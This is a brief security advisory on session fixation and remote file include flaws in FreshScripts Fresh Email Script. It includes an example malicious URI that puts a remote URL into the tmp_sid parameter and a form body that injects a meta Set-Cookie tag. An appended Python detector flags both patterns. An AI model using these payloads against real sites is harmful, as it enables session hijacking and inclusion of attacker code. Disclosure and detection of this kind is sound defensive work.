FreshScripts Fresh Email Script Session Fixation and Remote File Include Vulnerabilities

To exploit the session-fixation issue, an attacker must entice an unsuspecting victim into following a malicious URI.

The following example URI is available:

http://www.example.com/url.php?tmp_sid=http://www.example2.com/exploit

The following example cookie is available:

Email=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>&Password=1230321email@address.com&register=Register
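
A detection check for the two request shapes shown above, as an added example that is not part of the original advisory. The function name `inspect_request`, the finding labels and the `SAMPLES` list are assumptions made for illustration; the sample requests are constructed from the advisory's own example URI and form data, plus one benign request.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# A session identifier should be an opaque token, never a URL ("scheme://" or "//host").
URL_LIKE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.I)
# A <meta http-equiv="Set-Cookie"> tag in a form field sets a cookie if echoed back unescaped.
META_SET_COOKIE = re.compile(
    r"<\s*meta\b[^>]*http-equiv\s*=\s*['\"]?\s*set-cookie", re.I)


def inspect_request(url, body=""):
    """Return [(parameter, finding), ...] for one HTTP request.

    url  -- request URL (or path) including the query string
    body -- application/x-www-form-urlencoded POST body, if any
    """
    findings = []
    # parse_qsl URL-decodes values, so '+' and %xx encodings are normalised first.
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    params += parse_qsl(body, keep_blank_values=True)
    for name, value in params:
        if name == "tmp_sid" and URL_LIKE.match(value):
            findings.append((name, "url-in-session-parameter"))
        if META_SET_COOKIE.search(value):
            findings.append((name, "meta-set-cookie-injection"))
    return findings


# Constructed sample requests: (url, body)
SAMPLES = [
    ("http://www.example.com/url.php?tmp_sid=http://www.example2.com/exploit", ""),
    ("http://www.example.com/register.php",
     "Email=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>"
     "&Password=1230321email@address.com&register=Register"),
    ("http://www.example.com/url.php?tmp_sid=3f9a1c77", ""),  # benign token
]

if __name__ == "__main__":
    for url, body in SAMPLES:
        print(url, "->", inspect_request(url, body) or "clean")
```
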


 

Copyright 2010, SecurityFocus